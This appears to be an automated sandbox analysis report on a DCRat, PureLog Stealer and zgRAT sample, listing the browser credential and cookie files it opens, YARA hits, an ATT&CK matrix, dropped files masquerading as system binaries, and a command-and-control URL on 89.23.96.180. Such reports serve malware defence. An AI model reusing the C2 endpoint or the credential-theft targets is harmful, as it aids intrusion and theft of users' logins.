                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login DataJump to behavior

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000007.00000002.3303823064.0000000003794000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2117348326.0000000013BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: XNPOazHpXF.exe PID: 5688, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: services.exe PID: 1352, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: XNPOazHpXF.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.XNPOazHpXF.exe.fb0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2052319303.0000000000FB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Recovery\dllhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\InputMethod\CHT\services.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: XNPOazHpXF.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.XNPOazHpXF.exe.fb0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Recovery\dllhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\InputMethod\CHT\services.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts141
                              Windows Management Instrumentation                              		1
                              Scripting                              		12
                              Process Injection                              		232
                              Masquerading                              		1
                              OS Credential Dumping                              		331
                              Security Software Discovery                              		Remote Services11
                              Archive Collected Data                              		1
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault AccountsScheduled Task/Job1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		1
                              Disable or Modify Tools                              		LSASS Memory2
                              Process Discovery                              		Remote Desktop Protocol1
                              Data from Local System                              		1
                              Non-Application Layer Protocol                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)261
                              Virtualization/Sandbox Evasion                              		Security Account Manager261
                              Virtualization/Sandbox Evasion                              		SMB/Windows Admin Shares1
                              Clipboard Data                              		11
                              Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                              Process Injection                              		NTDS1
                              Application Window Discovery                              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              Deobfuscate/Decode Files or Information                              		LSA Secrets1
                              Remote System Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                              Obfuscated Files or Information                              		Cached Domain Credentials1
                              System Network Configuration Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              Software Packing                              		DCSync2
                              File and Directory Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              DLL Side-Loading                              		Proc Filesystem134
                              System Information Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579268 Sample: XNPOazHpXF.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Antivirus detection for dropped file 2->55 57 13 other signatures 2->57 7 XNPOazHpXF.exe 4 48 2->7         started        process3 file4 25 C:\Windows\InputMethod\CHT\services.exe, PE32 7->25 dropped 27 C:\Users\user\Desktop\xLaDTRLB.log, PE32 7->27 dropped 29 C:\Users\user\Desktop\udTfrDlO.log, PE32 7->29 dropped 31 36 other malicious files 7->31 dropped 59 Drops PE files with benign system names 7->59 11 cmd.exe 1 7->11         started        signatures5 process6 signatures7 61 Uses ping.exe to sleep 11->61 63 Drops executables to the windows directory (C:\Windows) and starts them 11->63 65 Uses ping.exe to check the status of other devices and networks 11->65 14 services.exe 14 284 11->14         started        19 conhost.exe 11->19         started        21 PING.EXE 1 11->21         started        23 chcp.com 1 11->23         started        process8 dnsIp9 41 89.23.96.180, 49714, 49721, 49724 MAXITEL-ASRU Russian Federation 14->41 33 C:\Users\user\Desktop\yGSOdQVY.log, PE32 14->33 dropped 35 C:\Users\user\Desktop\wwvNdyqX.log, PE32 14->35 dropped 37 C:\Users\user\Desktop\wSNFrCZa.log, PE32 14->37 dropped 39 24 other malicious files 14->39 dropped 43 Multi AV Scanner detection for dropped file 14->43 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->45 47 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 14->47 49 Tries to harvest and steal browser information (history, passwords, etc) 14->49 file10 signatures11

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              XNPOazHpXF.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              XNPOazHpXF.exe60%VirustotalBrowse
                              XNPOazHpXF.exe100%AviraHEUR/AGEN.1339906
                              XNPOazHpXF.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\user\Desktop\MpvkKZGd.log100%AviraTR/Agent.jbwuj
                              C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe100%AviraHEUR/AGEN.1339906
                              C:\Recovery\dllhost.exe100%AviraHEUR/AGEN.1339906
                              C:\Users\user\Desktop\BwIEkNWR.log100%AviraTR/AVI.Agent.updqb
                              C:\Users\user\Desktop\QKKBSDQi.log100%AviraHEUR/AGEN.1362695
                              C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe100%AviraHEUR/AGEN.1339906
                              C:\Users\user\Desktop\KnJCpqCi.log100%AviraHEUR/AGEN.1300079
                              C:\Users\user\Desktop\SVgCSVvi.log100%AviraTR/AD.BitpyRansom.lcksd
                              C:\Users\user\Desktop\BKAMFwmA.log100%AviraHEUR/AGEN.1300079
                              C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat100%AviraBAT/Delbat.C
                              C:\Users\user\Desktop\MYoSwDMa.log100%AviraTR/AVI.Agent.updqb
                              C:\Recovery\conhost.exe100%AviraHEUR/AGEN.1339906
                              C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe100%Joe Sandbox ML
                              C:\Recovery\dllhost.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\QKKBSDQi.log100%Joe Sandbox ML
                              C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\FsHliKMo.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\McDcppqu.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\KnJCpqCi.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\QgmbSWHW.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\BKAMFwmA.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\EvgdMKxt.log100%Joe Sandbox ML
                              C:\Recovery\conhost.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\conhost.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\dllhost.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\BKAMFwmA.log17%ReversingLabs
                              C:\Users\user\Desktop\BwIEkNWR.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\DujMFNlM.log25%ReversingLabs
                              C:\Users\user\Desktop\EvgdMKxt.log8%ReversingLabs
                              C:\Users\user\Desktop\FsHliKMo.log21%ReversingLabs
                              C:\Users\user\Desktop\HhBLiJAA.log8%ReversingLabs
                              C:\Users\user\Desktop\HpleNtbG.log9%ReversingLabs
                              C:\Users\user\Desktop\IzFuDcGk.log29%ReversingLabs
                              C:\Users\user\Desktop\JedTEJPv.log29%ReversingLabs
                              C:\Users\user\Desktop\KnJCpqCi.log4%ReversingLabs
                              C:\Users\user\Desktop\LozUEcuw.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\MYoSwDMa.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\McDcppqu.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\MpvkKZGd.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\PWGsgpUk.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Users\user\Desktop\QKKBSDQi.log17%ReversingLabs
                              C:\Users\user\Desktop\QOfJDANU.log25%ReversingLabs
                              C:\Users\user\Desktop\QgmbSWHW.log5%ReversingLabs
                              C:\Users\user\Desktop\RdNjnWVR.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\SRRrZjRP.log3%ReversingLabs
                              C:\Users\user\Desktop\SVgCSVvi.log33%ReversingLabsWin32.Ransomware.Bitpy
                              C:\Users\user\Desktop\TEZjEzBg.log12%ReversingLabs
                              C:\Users\user\Desktop\TuCjUNij.log21%ReversingLabs
                              C:\Users\user\Desktop\UbnsZBxQ.log29%ReversingLabsWin32.Trojan.Generic
                              C:\Users\user\Desktop\WLWsZSvc.log8%ReversingLabs
                              C:\Users\user\Desktop\XMTJgPHI.log12%ReversingLabs
                              C:\Users\user\Desktop\YwCJgfGU.log25%ReversingLabs
                              C:\Users\user\Desktop\cEzSCxAQ.log21%ReversingLabs
                              C:\Users\user\Desktop\dBbaXxPL.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\dxMPeMlr.log8%ReversingLabs
                              C:\Users\user\Desktop\fHiQeeRs.log17%ReversingLabs
                              C:\Users\user\Desktop\guqIJuAJ.log17%ReversingLabs
                              C:\Users\user\Desktop\hnCGlIml.log25%ReversingLabs
                              C:\Users\user\Desktop\hrRQfuPE.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\iSjOnjPm.log21%ReversingLabs
                              C:\Users\user\Desktop\iosYAuez.log17%ReversingLabs
                              C:\Users\user\Desktop\jkgzQrBD.log8%ReversingLabs
                              C:\Users\user\Desktop\kdtxsFme.log9%ReversingLabs
                              C:\Users\user\Desktop\kuAPHbgg.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\lQBpXVWv.log16%ReversingLabs
                              C:\Users\user\Desktop\naXqXoBw.log25%ReversingLabs
                              C:\Users\user\Desktop\oXyytoQr.log4%ReversingLabs
                              C:\Users\user\Desktop\olqGOXgZ.log33%ReversingLabsWin32.Ransomware.Bitpy
                              C:\Users\user\Desktop\piSOkXvU.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Users\user\Desktop\qWWWVlrS.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\qeFoAUSY.log16%ReversingLabs
                              C:\Users\user\Desktop\rbhxVUhT.log8%ReversingLabs
                              C:\Users\user\Desktop\sGFWWBqe.log5%ReversingLabs
                              C:\Users\user\Desktop\uMMNchrL.log25%ReversingLabs
                              C:\Users\user\Desktop\udTfrDlO.log8%ReversingLabs
                              C:\Users\user\Desktop\wSNFrCZa.log8%ReversingLabs
                              C:\Users\user\Desktop\wwvNdyqX.log3%ReversingLabs
                              C:\Users\user\Desktop\xLaDTRLB.log17%ReversingLabs
                              C:\Users\user\Desktop\yGSOdQVY.log29%ReversingLabsWin32.Trojan.Generic
                              C:\Windows\InputMethod\CHT\services.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              No Antivirus matches

                              Domains and IPs

                              Contacted Domains

                              No contacted domains info

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.phptrue
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ac.ecosia.org/autocomplete?q=services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtabservices.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drfalse
                                      		high
